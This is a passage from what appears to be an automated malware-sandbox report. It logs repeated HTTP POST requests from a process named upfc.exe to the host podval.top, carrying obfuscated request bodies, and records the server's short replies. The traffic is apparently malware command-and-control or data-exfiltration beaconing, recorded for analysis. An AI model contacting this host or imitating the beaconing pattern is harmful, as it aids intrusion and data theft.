                                                    Data Ascii: _SZ[^]WZXVUQP[YRU_^^QXS[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[&98')$ )-!=>-Y'C"'#,>?7;,"['$Y -
                                                    Jul 3, 2024 16:42:22.794450045 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:23.141895056 CEST577INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8n%2BeURfTyvwXiToKk9JdicPvJlPmY24iN1Mj%2BM0XK%2FVaWo7zuLTSJe9OXF9XNaAIhIGzl5OvNaJ4ZHFENowPDNUFpAY02ssGNPd5rz4%2FACYRyHBasZXuyI6UuODY"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a44c2b890cbc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:42:23.230195999 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.1049733188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:23.222450018 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:23.572700977 CEST1772OUTData Raw: 5f 55 5f 5d 5e 5a 57 50 58 56 55 51 50 5e 59 56 55 50 5e 58 51 5d 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_]^ZWPXVUQP^YVUP^XQ]SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[%_0C0 08>>) ":>.0%$R->?""<Z,<"['$Y
                                                    Jul 3, 2024 16:42:23.689896107 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:24.117372990 CEST727INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:24 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uZdWRs19mXO%2Feh8xVar6rE1um0q0xQC3pvb7W4D3lu6tmLYCQGNEiyuyfiqb8rStYp1dfLPI6nK3VSDFRgvzASM7zwuCDV7ssd6jrIXcKy6JVl3b8HL6%2BCsSKfNB"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a451ae1180d6-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 14 31 03 2d 11 31 32 2b 52 2e 13 02 0e 2b 04 34 59 3b 5f 39 14 3c 0a 26 03 3a 10 03 09 20 14 3e 5b 28 3c 2c 58 25 23 20 1c 22 0b 20 5b 04 1c 23 5b 3c 5c 2d 58 29 3b 33 52 24 3c 3d 0b 27 19 25 11 27 38 32 56 24 06 38 05 28 3b 29 56 30 0b 3f 59 3e 28 32 5b 3c 09 39 07 21 24 21 54 02 13 22 1c 33 04 29 1c 23 30 3f 1e 27 33 3e 01 33 24 06 0d 33 1d 35 0b 29 33 36 55 24 57 37 04 21 3f 2f 52 24 38 3e 5a 30 13 2e 00 23 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%1-12+R.+4Y;_9<&: >[(<,X%# " [#[<\-X);3R$<='%'82V$8(;)V0?Y>(2[<9!$!T"3)#0?'3>3$35)36U$W7!?/R$8>Z0.#(#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.1049734188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:23.367151022 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:23.713455915 CEST1060OUTData Raw: 5a 56 5f 5a 5b 59 52 5a 58 56 55 51 50 5f 59 53 55 5c 5e 58 51 5b 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZV_Z[YRZXVUQP_YSU\^XQ[SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X2:,@0#]' ]>=)R4*--5\$-Z$,-+X718[/,"['$Y =
                                                    Jul 3, 2024 16:42:23.825880051 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:24.172522068 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:24 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M27iI7JL4M8elboS6IXjZwpuE3A9pJopptXdM2NsJnToKpDMF2wOTbVwgRKu2eKCEqlOjy%2BazL1M%2FHqUwF0lJH4JfaNqp6xu2zaCORaDStLZXhCSW0hkQRPh4x9v"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a452afc08cca-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.1049735188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:24.298254967 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:24.650808096 CEST1060OUTData Raw: 5f 50 5a 58 5b 5a 57 51 58 56 55 51 50 58 59 56 55 51 5e 5f 51 58 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _PZX[ZWQXVUQPXYVUQ^_QXS^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&?'*#^'3#^)>!R4.%[.5]3&:'#'U8-# ";/,"['$Y !
                                                    Jul 3, 2024 16:42:24.753422022 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:24.970609903 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:25.093204975 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=euyZeTh3xtAu%2FZCaba8Zohsebc8gtUUoLwZKsfAY08k7G6JybdbBpnReH6dn1gqnQX9ODNER%2FBordHudXN%2BII6N8FSBNnZuSPjKurNbioMP%2FS7WuHIc%2F4ehhIfcq"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a45868230f78-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.1049736188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:25.259377003 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:25.604111910 CEST1060OUTData Raw: 5f 54 5f 5e 5b 5e 57 5f 58 56 55 51 50 5a 59 54 55 5c 5e 5c 51 59 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_^[^W_XVUQPZYTU\^\QYS[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!1:3'7]'0;=>1U --*3650/.<"" /"['$Y )
                                                    Jul 3, 2024 16:42:25.777451038 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:26.057024002 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:26 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ALb71SXPcsPS41%2FWoh7udoy9drnOVoiB1cMxPGWmepozpUB8nukQ4cQLC5gCff%2FN4TAGAKdWOhKfjKmqRjNMspVQnhrN8vVLqime5MhgmXEgyuRlc8fp6IEqMcmF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a45e598a18b4-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.1049737188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:26.187046051 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:26.541495085 CEST1060OUTData Raw: 5a 50 5f 55 5e 5c 52 58 58 56 55 51 50 5d 59 5b 55 5f 5e 5d 51 59 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZP_U^\RXXVUQP]Y[U_^]QYS]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%$0'0# =-T#!Y..Z'&9X$7-.7_8"['$Y 5
                                                    Jul 3, 2024 16:42:26.682478905 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:27.008877993 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:26 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gEPqcusRksK4KMDbJp6Zo0P0%2BcHm6e%2BRd1bLCjIquV3A7kNAarY%2FKaegJYLocjTpCXg6se1IrPwDAseMbhNhYJos3fDWTVP8uGP8OCK7QT2IK4CxGp37yLFYZgtx"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4646f350c7e-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.1049738188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:27.140454054 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:27.496376038 CEST1060OUTData Raw: 5f 53 5a 5f 5b 58 57 5c 58 56 55 51 50 5c 59 52 55 5d 5e 5b 51 5a 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _SZ_[XW\XVUQP\YRU]^[QZSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\&)$($#;\=.%7%-)[$&90#?V/X(""/<"['$Y 1
                                                    Jul 3, 2024 16:42:27.590604067 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:27.935386896 CEST576INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XIRWzQ9Sh588M2s8vdi1n7ZmsQkMTro55%2FJHWPFs065DtJswCJALTtP8lUt1K5MEdqwMvZMSK1EV8pBkN9RVxtv0SJK1ctDbRKoI7NI8IpKX8KtoThnSotGywtZh"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a46a2f5619a1-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.1049739188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:28.064877033 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:28.416408062 CEST1060OUTData Raw: 5a 51 5a 58 5e 5b 52 5c 58 56 55 51 50 5c 59 54 55 51 5e 5b 51 5f 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZQZX^[R\XVUQP\YTUQ^[Q_SYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[&:8E0:?_03?=>"7=*9.*3&=%# /=?X 2^/"['$Y 1
                                                    Jul 3, 2024 16:42:28.518400908 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:28.853379965 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:28 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YpUSSeGYuR9r%2BPGwOtEVE04PnISm3CrsKtpYKmmGGRoL6dQtKNPRy1iBghlkoSxDO8J2NI9SCViRjwZfRX2IYmg1cufmwrA0a57UWAgGnAT5R01R%2BmpEipeFEsG0"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a46ffef00f7d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.1049740188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:29.008456945 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.1049741188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:29.166922092 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:29.525845051 CEST1748OUTData Raw: 5a 52 5f 5d 5e 5a 52 5f 58 56 55 51 50 51 59 50 55 51 5e 5e 51 5f 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_]^ZR_XVUQPQYPUQ^^Q_S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"20@$*;X$[*=%T4:.>='&=]$3U8+X7 ^/"['$Y
                                                    Jul 3, 2024 16:42:29.605021000 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:29.959417105 CEST731INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2BkzOhN2KoLji%2Fnf8RJKB5fH%2B9SXjt2txWahPImRt8NqFR5NgWshoe4zStFlgK6MfO6E5OYi9u3yTa3g7iAi124yz7KopydIxS3JmMDZfycfOVR9qiZN%2BiTSlHEH"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a476b81e1801-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 04 26 29 29 58 26 22 20 0c 39 03 3b 1a 3c 3e 28 1b 3b 5f 35 5f 3f 34 36 05 2e 00 2e 53 34 5c 35 02 3f 05 2f 07 26 20 01 09 21 1b 20 5b 04 1c 23 5c 3e 29 21 5a 28 16 05 52 26 3f 2e 1a 30 34 3e 05 33 2b 26 11 27 5e 28 05 3c 38 35 51 27 22 3b 58 3d 06 07 01 3f 34 31 02 36 34 21 54 02 13 22 57 30 2d 3d 55 23 33 3f 57 26 1e 1c 07 30 27 2f 54 24 20 29 0c 2a 0a 25 0a 24 08 3c 5c 35 11 24 0a 33 06 00 15 30 3e 22 02 22 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&))X&" 9;<>(;_5_?46..S4\5?/& ! [#\>)!Z(R&?.04>3+&'^(<85Q'";X=?4164!T"W0-=U#3?W&0'/T$ )*%$<\5$30>""#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.1049742188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:29.356059074 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:29.713443995 CEST1060OUTData Raw: 5f 53 5f 5b 5b 5b 52 5f 58 56 55 51 50 5b 59 51 55 5c 5e 5f 51 55 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _S_[[[R_XVUQP[YQU\^_QUS]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\&9&)/\'37*.49Z,>5[35)0#,.Y42+/,"['$Y -
                                                    Jul 3, 2024 16:42:29.813816071 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:30.150537014 CEST576INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jyVcVDsTVizqlJBgbCGuRm6YumtghWOSgYeHlAoMkzYVvPEQGMfMPvwfPOhA6Xu0xGdrTgycaj%2BRlyNdqmM8xn0tJiIjNd12zFh6mszczqGlDS0XtHU6hWyjjD6U"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4780d4bc481-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.1049743188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:30.381244898 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:30.728904009 CEST1060OUTData Raw: 5f 53 5a 58 5b 56 57 50 58 56 55 51 50 5d 59 53 55 5b 5e 54 51 54 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
